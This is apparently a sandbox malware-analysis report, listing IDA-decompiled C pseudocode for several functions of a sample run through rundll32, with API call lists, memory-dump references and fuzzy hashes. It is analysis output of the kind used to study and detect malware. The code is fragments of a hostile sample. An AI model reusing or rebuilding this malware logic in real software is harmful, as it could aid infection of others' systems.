                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: 5d0f7e1ec4daf1eba71affaa1220c2938c1727565ff21c3dd80ac7c65eaf0c21
                                          • Instruction ID: 36a7eb1f37ccf667e866196b0d73c4065c272feb597309a25397bdcf0eb7aeda
                                          • Opcode Fuzzy Hash: 5d0f7e1ec4daf1eba71affaa1220c2938c1727565ff21c3dd80ac7c65eaf0c21
                                          • Instruction Fuzzy Hash: D6018F31204600AAEB307E60DE44F5BB6E5FF84368F104A2EF6D1B18E0D625F805DE61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04086A7F, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04086A7F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x408d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x408d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x408d258 = _t6;
					 *0x408d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x408d254 = _t7;
					if(_t7 == 0) {
						 *0x408d254 =  *0x408d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                          0x04086a87
                                          0x04086a8d
                                          0x04086a94
                                          0x00000000
                                          0x04086aee
                                          0x04086a96
                                          0x04086a9e
                                          0x04086aab
                                          0x04086aab
                                          0x04086aeb
                                          0x00000000
                                          0x04086aeb
                                          0x04086aad
                                          0x04086aad
                                          0x04086ab2
                                          0x04086ac4
                                          0x04086ac9
                                          0x04086acf
                                          0x04086ad5
                                          0x04086adc
                                          0x04086ade
                                          0x04086ade
                                          0x00000000
                                          0x04086ae5
                                          0x04086aa7
                                          0x00000000
                                          0x00000000
                                          0x04086aa9
                                          0x00000000

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,040890D2,?), ref: 04086A87
                                          • GetVersion.KERNEL32 ref: 04086A96
                                          • GetCurrentProcessId.KERNEL32 ref: 04086AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04086ACF
                                          • GetLastError.KERNEL32 ref: 04086AEE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 11ad4c9f67123eefee3906ee58c067ffc87bf470e676fdc7bf0e9973a47d9849
                                          • Instruction ID: 58b4de184c532b5ca78773df3fb0c731f605d1d8a59ae4a8fc4944616e29815d
                                          • Opcode Fuzzy Hash: 11ad4c9f67123eefee3906ee58c067ffc87bf470e676fdc7bf0e9973a47d9849
                                          • Instruction Fuzzy Hash: C7F06D706443029BE750AF64BB09B153BB1EB54751F118A3EE5C2F61C0DA7ED851CF26
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040891B5, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E040891B5(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x408d2a4; // 0xbfa5a8
					_t5 = _t103 + 0x408e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x408c298);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x408d2a4; // 0xbfa5a8
												_t28 = _t109 + 0x408e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x408d2a4; // 0xbfa5a8
														_t33 = _t79 + 0x408e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                          0x040891ba
                                          0x040891c3
                                          0x040891c4
                                          0x040891c8
                                          0x040891ce
                                          0x040891d4
                                          0x040891dd
                                          0x040891e3
                                          0x040891ed
                                          0x040891ef
                                          0x040891f5
                                          0x040891fa
                                          0x04089205
                                          0x0408920b
                                          0x04089210
                                          0x04089332
                                          0x04089216
                                          0x04089216
                                          0x04089223
                                          0x04089229
                                          0x0408922f
                                          0x04089233
                                          0x04089239
                                          0x04089246
                                          0x0408924a
                                          0x04089250
                                          0x04089253
                                          0x0408925b
                                          0x0408925c
                                          0x04089260
                                          0x04089264
                                          0x04089267
                                          0x0408926a
                                          0x04089270
                                          0x04089279
                                          0x0408927f
                                          0x04089280
                                          0x04089283
                                          0x04089284
                                          0x04089285
                                          0x0408928d
                                          0x0408928e
                                          0x0408928f
                                          0x04089291
                                          0x04089295
                                          0x04089299
                                          0x00000000
                                          0x00000000
                                          0x0408929f
                                          0x040892a8
                                          0x040892ae
                                          0x040892b8
                                          0x040892bc
                                          0x040892be
                                          0x040892cb
                                          0x040892cf
                                          0x040892d7
                                          0x040892dc
                                          0x040892ee
                                          0x040892f0
                                          0x040892f6
                                          0x040892f6
                                          0x040892ff
                                          0x040892ff
                                          0x04089301
                                          0x04089307
                                          0x04089307
                                          0x0408930a
                                          0x04089310
                                          0x04089313
                                          0x0408931c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0408931c
                                          0x04089270
                                          0x0408926a
                                          0x04089253
                                          0x04089322
                                          0x04089322
                                          0x04089328
                                          0x04089328
                                          0x0408932e
                                          0x0408932e
                                          0x04089337
                                          0x0408933d
                                          0x0408933d
                                          0x040891fa
                                          0x04089346

                                          APIs
                                          • SysAllocString.OLEAUT32(0408C298), ref: 04089205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 040892E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 040892FF
                                          • SysFreeString.OLEAUT32(?), ref: 0408932E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: 3000521cec2942a4df21c7fc7de9cb9a28ecea066ebb35a0e045cca566589fa0
                                          • Instruction ID: 3164d534c968693fc9e16d090bcae1b6d0945d89ea1e48298b46f3d81fa7c62d
                                          • Opcode Fuzzy Hash: 3000521cec2942a4df21c7fc7de9cb9a28ecea066ebb35a0e045cca566589fa0
                                          • Instruction Fuzzy Hash: FB513C75E00519EFCB00EFE8C9889EEB7B9EF89704B144598E955FB260D731AD41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04087664, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E04087664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E040848F0(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E0408748A(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04087074(_t101,  &_v236, _a8, _t96 - _t81);
					E04087074(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E0408748A(_t101, 0x408d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E0408748A(_a16, _a4);
						E04082FED(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0408B088();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0408B082();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04086FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E040815CE(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E0408687D(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x408d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                          0x04087667
                                          0x04087673
                                          0x04087679
                                          0x0408767e
                                          0x04087682
                                          0x040877df
                                          0x040877e3
                                          0x040877e3
                                          0x04087688
                                          0x0408768c
                                          0x04087690
                                          0x04087693
                                          0x0408769e
                                          0x040876a4
                                          0x040876a9
                                          0x040876ac
                                          0x040876c6
                                          0x040876d2
                                          0x040876db
                                          0x040876e5
                                          0x040876ea
                                          0x040876ec
                                          0x040876ef
                                          0x0408779d
                                          0x040877a3
                                          0x040877b4
                                          0x040877c7
                                          0x040877d7
                                          0x00000000
                                          0x040877dc
                                          0x040876f8
                                          0x040876ff
                                          0x04087703
                                          0x04087709
                                          0x0408770b
                                          0x0408770d
                                          0x0408770f
                                          0x04087711
                                          0x0408771b
                                          0x04087720
                                          0x04087722
                                          0x04087724
                                          0x04087725
                                          0x04087726
                                          0x04087727
                                          0x0408772e
                                          0x04087735
                                          0x04087738
                                          0x04087738
                                          0x04087705
                                          0x04087705
                                          0x04087705
                                          0x04087740
                                          0x04087748
                                          0x04087751
                                          0x04087756
                                          0x04087756
                                          0x0408775b
                                          0x00000000
                                          0x00000000
                                          0x0408775d
                                          0x04087760
                                          0x0408776a
                                          0x00000000
                                          0x00000000
                                          0x0408776c
                                          0x0408776c
                                          0x04087776
                                          0x04087756
                                          0x0408775b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0408775b
                                          0x04087780
                                          0x04087783
                                          0x04087786
                                          0x0408778d
                                          0x0408778d
                                          0x0408779a
                                          0x00000000
                                          0x0408779a
                                          0x04087695
                                          0x04087699
                                          0x0408769a
                                          0x0408769c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0408769c
                                          0x00000000

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04087711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04087727
                                          • memset.NTDLL ref: 040877C7
                                          • memset.NTDLL ref: 040877D7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: 1bf43ce0ca2c93d490e90e8e13b539c638166e2195a02a36812bd2dad28281a2
                                          • Instruction ID: 756fbb6bf7d691bb2d4595eda112db811a3e25eaf3c0e035904940083b75fbdb
                                          • Opcode Fuzzy Hash: 1bf43ce0ca2c93d490e90e8e13b539c638166e2195a02a36812bd2dad28281a2
                                          • Instruction Fuzzy Hash: B4416131A00249ABDB10FEA8CD40FDE7BB4EF44718F20852DB955BB184EB71BA54CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0408A96C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 0408A97E
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • ResetEvent.KERNEL32(?), ref: 0408A9F2
                                          • GetLastError.KERNEL32 ref: 0408AA15
                                          • GetLastError.KERNEL32 ref: 0408AAC0
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: 70019b67ad4cb1dcb64f9028b5f79749a7b82ec582dcdf1cdbca66ccf6455da9
                                          • Instruction ID: fe40d63065e25dbe8b49752794e2cfc2d178321c651f2a9bd6c6f5a8f485f099
                                          • Opcode Fuzzy Hash: 70019b67ad4cb1dcb64f9028b5f79749a7b82ec582dcdf1cdbca66ccf6455da9
                                          • Instruction Fuzzy Hash: 95416471600604BBEB21AFA5DE88E9B7ABDEF84714B14492DB582F1990D739A905CE20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04088F08, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E04088F08(void* __eax) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x408d138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x408d168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E040858BE(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x408d138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E0408147E(_v16);
							if(_t58 == 0) {
								_t58 = E040816DB(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E04089D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E04089D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                          0x04088f17
                                          0x04088f1c
                                          0x04088f1e
                                          0x04088f23
                                          0x04088f24
                                          0x04088f29
                                          0x04088f2a
                                          0x04088f35
                                          0x04088f66
                                          0x04088f6b
                                          0x0408902e
                                          0x04089031
                                          0x04089037
                                          0x04089037
                                          0x04088f78
                                          0x04088f80
                                          0x0408902b
                                          0x00000000
                                          0x0408902b
                                          0x04088f8b
                                          0x04088f90
                                          0x04088f95
                                          0x0408901d
                                          0x0408901e
                                          0x0408901e
                                          0x04089024
                                          0x00000000
                                          0x04089024
                                          0x04088f9b
                                          0x04088f9d
                                          0x04088fa3
                                          0x04088fa4
                                          0x04088fa4
                                          0x04088fa7
                                          0x04088faa
                                          0x04088fb0
                                          0x04088fb5
                                          0x04088fb6
                                          0x04088fbb
                                          0x04088fbe
                                          0x04088fc9
                                          0x00000000
                                          0x00000000
                                          0x04088fd1
                                          0x04088fd9
                                          0x04089002
                                          0x04089005
                                          0x0408900c
                                          0x04089017
                                          0x04089017
                                          0x00000000
                                          0x0408900c
                                          0x04088fe5
                                          0x04088fe9
                                          0x00000000
                                          0x00000000
                                          0x04088feb
                                          0x04088ff0
                                          0x00000000
                                          0x00000000
                                          0x04088ff2
                                          0x04088ff2
                                          0x04088ff7
                                          0x00000000
                                          0x00000000
                                          0x04088ff9
                                          0x04088ffa
                                          0x04088ffd
                                          0x04088ffd
                                          0x04088fa4
                                          0x04088f3d
                                          0x04088f45
                                          0x04088f5e
                                          0x04088f60
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04088f60
                                          0x04088f51
                                          0x04088f55
                                          0x00000000
                                          0x00000000
                                          0x04088f5b
                                          0x00000000

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 04088F1E
                                          • GetLastError.KERNEL32 ref: 04088F37
                                            • Part of subcall function 04089D3A: WaitForMultipleObjects.KERNEL32(00000002,0408AA33,00000000,0408AA33,?,?,?,0408AA33,0000EA60), ref: 04089D55
                                          • ResetEvent.KERNEL32(?), ref: 04088FB0
                                          • GetLastError.KERNEL32 ref: 04088FCB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: b1f1509ca5344e8b674503df6991f01157d92080d4c4cf67786beb4d88e895a4
                                          • Instruction ID: 6319e352f56f2f6cf389baba71d2b7359ae338ab256fe99fb43ba3dccc6f0b05
                                          • Opcode Fuzzy Hash: b1f1509ca5344e8b674503df6991f01157d92080d4c4cf67786beb4d88e895a4
                                          • Instruction Fuzzy Hash: 3431A272600604AFDB61BFA4CE44EAE77B9EF88364F14452CE591B7290EA70F941AB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040872F2, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E040872F2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x408d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x408d2a4; // 0xbfa5a8
				_t3 = _t8 + 0x408e836; // 0x61636f4c
				_t25 = 0;
				_t30 = E04086AF7(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x408d2a8, 1, 0, _t30);
					E0408147E(_t30);
				}
				_t12 =  *0x408d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E040856A2() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04081493(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x408d110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04087827(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                          0x040872f3
                                          0x040872fa
                                          0x04087304
                                          0x04087308
                                          0x0408730e
                                          0x0408731d
                                          0x04087324
                                          0x04087328
                                          0x0408733a
                                          0x0408733c
                                          0x0408733c
                                          0x04087341
                                          0x04087348
                                          0x0408739f
                                          0x0408739f
                                          0x040873a5
                                          0x040873a7
                                          0x040873a7
                                          0x040873b1
                                          0x040873b5
                                          0x040873c7
                                          0x040873c7
                                          0x040873cb
                                          0x040873d1
                                          0x040873d1
                                          0x00000000
                                          0x04087361
                                          0x04087366
                                          0x0408736e
                                          0x04087372
                                          0x04087376
                                          0x04087376
                                          0x04087383
                                          0x04087387
                                          0x0408738b
                                          0x040873e0
                                          0x040873e6
                                          0x040873e6
                                          0x04087399
                                          0x0408739d
                                          0x040873d4
                                          0x040873d6
                                          0x040873d9
                                          0x040873d9
                                          0x00000000
                                          0x040873d6
                                          0x0408739d
                                          0x00000000
                                          0x04087387

                                          APIs
                                            • Part of subcall function 04086AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04082098,74666F53,00000000,?,0408D00C,?,?), ref: 04086B2D
                                            • Part of subcall function 04086AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 04086B51
                                            • Part of subcall function 04086AF7: lstrcat.KERNEL32(00000000,00000000), ref: 04086B59
                                          • CreateEventA.KERNEL32(0408D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0408555B,?,?,?), ref: 04087333
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,0408555B,00000000,00000000,?,00000000,?,0408555B,?,?,?), ref: 04087393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0408555B,?,?,?), ref: 040873C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0408555B,?,?,?), ref: 040873D9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: 97c038fe1ceebe75dfbccb48b83d1d7d64134892459555a628d7edd432f9d569
                                          • Instruction ID: 7870164c69cb16f1e6cd48066df3912a80e01bb6c101ba728d18594d74f75ee3
                                          • Opcode Fuzzy Hash: 97c038fe1ceebe75dfbccb48b83d1d7d64134892459555a628d7edd432f9d569
                                          • Instruction Fuzzy Hash: 632125326003529BD7717E689E44A6B76E9EF84714B25063CFED1FB148DBA8EC018652
                                          Uniqueness

                                          Uniqueness Score: -1.00%

